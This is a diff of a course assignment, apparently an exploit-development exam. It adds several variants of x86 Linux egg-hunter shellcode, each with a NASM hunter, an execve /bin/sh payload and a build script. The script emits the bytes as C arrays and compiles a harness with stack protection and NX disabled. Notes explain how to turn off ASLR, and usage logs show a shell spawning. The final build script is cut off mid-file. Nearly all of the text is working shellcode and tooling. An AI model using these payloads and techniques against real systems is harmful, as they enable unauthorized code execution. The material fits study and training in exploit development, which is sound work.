Assignment 3 - major update

exam3/access-noloop/NOTES

@@ -0,0 +1,11 @@
+NOTES
+
+  no-stack-protector:	disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+  execstack:		disables Executable space protection (NX).
+			Or Data Execution Prevention (DEP) on Windows,
+			or Write XOR Execute (W^X) on BSD.
+			CPU’s NX bit ("Never eXecute").
+
+  To disalbe Address Space Layout Randomization (ASLR) when running binary
+  setarch `arch` -R ./program

exam3/access-noloop/USAGE

@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-noloop$ ./make.sh "HereItIs"
+ [I] Using custom EGG mark: HereItIs
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5260 Mar 28 13:01 ./shellcode
+ [+] All done!
+
+3. Run the shellcode
+
+access-noloop$ ./shellcode 
+Hunter Length:  66
+Payload Length:  36
+sh-4.1$ 
+

exam3/access-noloop/hunter.nasm

@@ -0,0 +1,87 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: hunter.nasm *access +noloop modification
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .data
+	egg1	equ "Egg-"	; DWORD Egg marker part1
+	egg2	equ "Mark"	; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+        ; function Prologue
+        push ebp
+        mov ebp, esp
+
+	; preserve registers and flags 	
+	pushad
+	pushfd
+
+
+	; Used for cmp edx, esi below
+	push 0xfffefff
+	pop esi
+	inc esi
+
+	xor edx, edx	; Searching the whole memory
+
+
+	; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+;	cmp edx, 0xffff000
+	cmp edx, esi	; We don't want NULL bytes
+	jz Return	; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
+
+	or dx, 0xfff	; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+	inc edx		; Searching forward
+
+	; Checking if memory is accessible
+	push byte +0x21		; 0x21 = 33 = __NR_access
+	pop eax			; EAX points to 0x21
+	lea ebx, [edx+0x8]	; next address to check
+	xor ecx, ecx		; 0: mode = F_OK
+	int 0x80
+	cmp al, -14		; -14 = EFAULT = Bad address.  See /usr/include/asm-generic/errno-base.h
+	jz nextPage
+
+
+        ; Searching for the Egg marker (in current page of memory which is accessible)
+	cmp dword [edx], egg1
+	jne nextAddr
+	cmp dword [edx+0x4], egg2
+	jne nextAddr
+
+	lea ecx, [edx+0x8]
+	jmp ecx
+
+Return:
+	; restore registers and stack 
+	popfd
+	popad
+
+        ; function Epilogue
+        mov esp, ebp
+        pop ebp
+
+	ret

exam3/access-noloop/make.sh

@@ -0,0 +1,132 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+  echo " [I] Argument not specified. Using default EGG mark."
+  ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+  echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+  exit 1;
+else
+  echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g'))		# set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+  echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+  echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+
+        printf("NO LOOP!\n");
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"

exam3/access-noloop/payload.nasm

@@ -0,0 +1,44 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+

exam3/access-noloop/shellcode.c

@@ -0,0 +1,20 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\x31\xd2\x39\xf2\x74\x2a\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x12\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+
+        printf("NO LOOP!\n");
+}

exam3/access-scasd-noloop/NOTES

@@ -0,0 +1,11 @@
+NOTES
+
+  no-stack-protector:	disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+  execstack:		disables Executable space protection (NX).
+			Or Data Execution Prevention (DEP) on Windows,
+			or Write XOR Execute (W^X) on BSD.
+			CPU’s NX bit ("Never eXecute").
+
+  To disalbe Address Space Layout Randomization (ASLR) when running binary
+  setarch `arch` -R ./program

exam3/access-scasd-noloop/USAGE

@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-scasd-noloop$ ./make.sh "HereItIs"
+ [I] Using custom EGG mark: HereItIs
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5260 Mar 28 13:14 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access-scasd-noloop$ ./shellcode 
+Hunter Length:  68
+Payload Length:  36
+sh-4.1$

exam3/access-scasd-noloop/hunter.nasm

@@ -0,0 +1,92 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: hunter.nasm *access-scasd +noloop modification
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .data
+	egg1	equ "Egg-"	; DWORD Egg marker part1
+	egg2	equ "Mark"	; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+        ; function Prologue
+        push ebp
+        mov ebp, esp
+
+	; preserve registers and flags 	
+	pushad
+	pushfd
+
+
+	; Used for cmp edx, esi below
+	push 0xfffefff
+	pop esi
+	inc esi
+
+
+	cld		; clear direction flag (DF) to use scasd properly
+	xor edx, edx	; Searching the whole memory
+
+        ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+;       cmp edx, 0xffff000
+        cmp edx, esi    ; We don't want NULL bytes
+       	jz Return	; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg)
+
+	or dx, 0xfff	; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+	inc edx		; Searching forward
+
+	; Checking if memory is accessible
+	push byte +0x21		; 0x21 = 33 = __NR_access
+	pop eax			; EAX points to 0x21
+	lea ebx, [edx+0x4]	; address to check
+	xor ecx, ecx		; 0: mode = F_OK
+	int 0x80
+	cmp al, -14		; -14 = EFAULT = Bad address.  See /usr/include/asm-generic/errno-base.h
+	jz nextPage
+
+
+        ; Searching for the Egg marker (in current page of memory which is accessible)
+	mov eax, egg1
+	mov edi, edx
+	scasd		; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
+	jnz nextAddr
+
+	mov eax, egg2
+	lea edi, [edx+4] ; address to check
+	scasd		; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
+	jnz nextAddr
+	jmp edi
+
+Return:
+        ; restore registers and stack
+        popfd
+	popad
+
+        ; function Epilogue
+	mov esp, ebp
+        pop ebp
+
+        ret
+

exam3/access-scasd-noloop/make.sh

@@ -0,0 +1,132 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+  echo " [I] Argument not specified. Using default EGG mark."
+  ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+  echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+  exit 1;
+else
+  echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g'))		# set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+  echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+  echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
+unsigned char garbage2[] = \
+"And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+
+        printf("NO LOOP!\n");
+}
+EOF
+
+echo " [+] Compiling shellcode.c ..."
+gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+# Cleanup
+rm -f payload.o payload hunter.o hunter
+
+ls -la ./shellcode
+
+echo " [+] All done!"

exam3/access-scasd-noloop/payload.nasm

@@ -0,0 +1,44 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+; Filename: payload-execve-stack.nasm
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+
+global _start
+
+
+section .text
+
+_start:
+	; EAX
+	xor eax, eax
+        mov al, 11              ; execve syscall
+
+        ; EBX
+        xor edx, edx
+	push edx                ; NULL termination of '//bin/sh' string
+        push 0x68732f6e         ; '//bin/sh' in reverse
+        push 0x69622f2f         ; beginning of '//bin/sh' string is here
+        mov ebx, esp            ; put the address of '//bin/sh' into ebx via esp
+
+	; ECX
+        push edx                ; NULL termination of a stack
+        push ebx                ; load our '//bin/sh' on a stack
+        mov ecx, esp            ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
+
+        ; EDX
+        push edx                ; NULL terminator
+        mov edx, esp            ; EDX is a PTR to a stack which has an address to NULL.
+        int 0x80
+

exam3/access-scasd-noloop/shellcode.c

@@ -0,0 +1,20 @@
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\xfc\x31\xd2\x39\xf2\x74\x2b\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7\x9d\x61\x89\xec\x5d\xc3";
+
+unsigned char garbage1[] = "Just some garbage here...";
+
+unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+
+unsigned char garbage2[] = "And some garbage there...";
+
+main()
+{
+	printf("Hunter Length:  %d\n", strlen(hunter));
+	printf("Payload Length:  %d\n", strlen(payload));
+	int (*ret)() = (int(*)())hunter;
+	ret();
+
+        printf("NO LOOP!\n");
+}

exam3/access-scasd/NOTES

@@ -0,0 +1,11 @@
+NOTES
+
+  no-stack-protector:	disables GCC Stack-Smashing Protector (SSP), aka ProPolice
+
+  execstack:		disables Executable space protection (NX).
+			Or Data Execution Prevention (DEP) on Windows,
+			or Write XOR Execute (W^X) on BSD.
+			CPU’s NX bit ("Never eXecute").
+
+  To disalbe Address Space Layout Randomization (ASLR) when running binary
+  setarch `arch` -R ./program

exam3/access-scasd/USAGE

@@ -0,0 +1,27 @@
+USAGE
+
+1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
+
+
+2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
+
+access-scasd$ ./make.sh "MyEgg123"
+ [I] Using custom EGG mark: MyEgg123
+ [+] Compiling payload.nasm ...
+ [+] Compiling hunter.nasm ...
+ [+] Extracting PAYLOAD code from payload ...
+ [+] Adding EGG mark to PAYLOAD ...
+ [+] Checking PAYLOAD code for NULLs ...
+ [+] Extracting HUNTER code from hunter ...
+ [+] Checking HUNTER code for NULLs ...
+ [+] Compiling shellcode.c ...
+-rwx------. 1 arno arno 5132 Mar 27 23:37 ./shellcode
+ [+] All done!
+
+
+3. Run the shellcode
+
+access-scasd$ ./shellcode 
+Hunter Length:  46
+Payload Length:  36
+sh-4.1$ 

exam3/access-scasd/hunter.nasm

@@ -0,0 +1,61 @@
+;    This program is free software: you can redistribute it and/or modify
+;    it under the terms of the GNU General Public License as published by
+;    the Free Software Foundation, either version 3 of the License, or
+;    (at your option) any later version.
+;
+;    This program is distributed in the hope that it will be useful,
+;    but WITHOUT ANY WARRANTY; without even the implied warranty of
+;    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+;    GNU General Public License for more details.
+;
+;    You should have received a copy of the GNU General Public License
+;    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+;
+;
+; Filename: hunter.nasm *access-scasd modification
+; Author: Andrey Arapov <andrey.arapov@gmail.com>
+; 2013 March
+;
+;
+
+section .data
+	egg1	equ "Egg-"	; DWORD Egg marker part1
+	egg2	equ "Mark"	; DWORD Egg marker part2
+
+
+section .text
+global _start
+
+
+_start:
+	cld		; clear direction flag (DF) to use scasd properly
+	xor edx, edx	; Searching the whole memory
+
+        ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker
+nextPage:
+	or dx, 0xfff	; The same as "add dx, 4095" (PAGE_SIZE)
+
+nextAddr:
+	inc edx		; Searching forward
+
+	; Checking if memory is accessible
+	push byte +0x21		; 0x21 = 33 = __NR_access
+	pop eax			; EAX points to 0x21
+	lea ebx, [edx+0x4]	; address to check
+	xor ecx, ecx		; 0: mode = F_OK
+	int 0x80
+	cmp al, -14		; -14 = EFAULT = Bad address.  See /usr/include/asm-generic/errno-base.h
+	jz nextPage
+
+
+        ; Searching for the Egg marker (in current page of memory which is accessible)
+	mov eax, egg1
+	mov edi, edx
+	scasd		; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4
+	jnz nextAddr
+
+	mov eax, egg2
+	lea edi, [edx+4] ; address to check
+	scasd		; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4
+	jnz nextAddr
+	jmp edi

exam3/access-scasd/make.sh

@@ -0,0 +1,130 @@
+#!/usr/bin/env sh
+#
+# USAGE
+# ./make.sh [Egg-Mark]
+#
+# NOTE
+# Egg-Mark must be a plaintext with 8 bytes in length
+# If Egg-Mark was not specified, the default one will be used.
+#
+# To specify a custom payload, simply modify the code of payload.nasm file.
+# Alternativly, you can modify PAYLOADCODE= variable down below the code.
+#
+
+ARG1=$1
+
+if [ -z "$ARG1" ]; then
+  echo " [I] Argument not specified. Using default EGG mark."
+  ARG1="Egg-Mark";
+elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
+  echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
+  exit 1;
+else
+  echo " [I] Using custom EGG mark: "$ARG1
+fi
+
+
+DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g'))		# set in hunter.nasm
+EGGMARK=$ARG1
+NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
+
+# Uncomment to save EGGMARK in HEX
+EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
+
+# Cleanup
+rm -f shellcode payload.o payload hunter.o hunter
+
+echo " [+] Compiling payload.nasm ..."
+nasm -f elf32 -o payload.o payload.nasm
+ld -m elf_i386 -o payload payload.o
+
+echo " [+] Compiling hunter.nasm ..."
+nasm -f elf32 -o hunter.o hunter.nasm
+ld -m elf_i386 -o hunter hunter.o
+
+echo " [+] Extracting PAYLOAD code from payload ..."
+PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
+
+echo " [+] Adding EGG mark to PAYLOAD ..."
+FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
+
+echo " [+] Checking PAYLOAD code for NULLs ..."
+if [[ $FULL_PAYLOADCODE == *00* ]]; then
+  echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+echo " [+] Extracting HUNTER code from hunter ..."
+HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
+
+# For debugging only
+#echo ${DEFAULTEGG[0]}
+#echo ${DEFAULTEGG[1]}
+#echo ${NEWEGG[0]}
+#echo ${NEWEGG[1]}
+
+# Preparing Default egg to HEX form in order to replace it with a New egg
+DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in HEX format
+NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
+
+# Uncomment to save new EGGMARK in Plaintext format
+#NEWEGG1=$(echo -n ${NEWEGG[0]})
+#NEWEGG2=$(echo -n ${NEWEGG[1]})
+
+
+FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
+
+echo " [+] Checking HUNTER code for NULLs ..."
+if [[ $FULL_HUNTERCODE == *00* ]]; then
+  echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
+  exit 1
+fi
+
+
+# Uncomment to see what will is replaced (default egg with a new one)
+#echo $DEFEGG1
+#echo $DEFEGG2
+#echo $NEWEGG1
+#echo $NEWEGG2
+#echo $HUNTERCODE
+#echo $FULL_HUNTERCODE
+
+cat > shellcode.c << EOF
+#include <stdio.h>
+#include <string.h>
+
+unsigned char hunter[] = \
+$FULL_HUNTERCODE;
+
+unsigned char garbage1[] = \
+"Just some garbage here...";
+
+unsigned char payload[] = \
+$FULL_PAYLOADCODE;
+
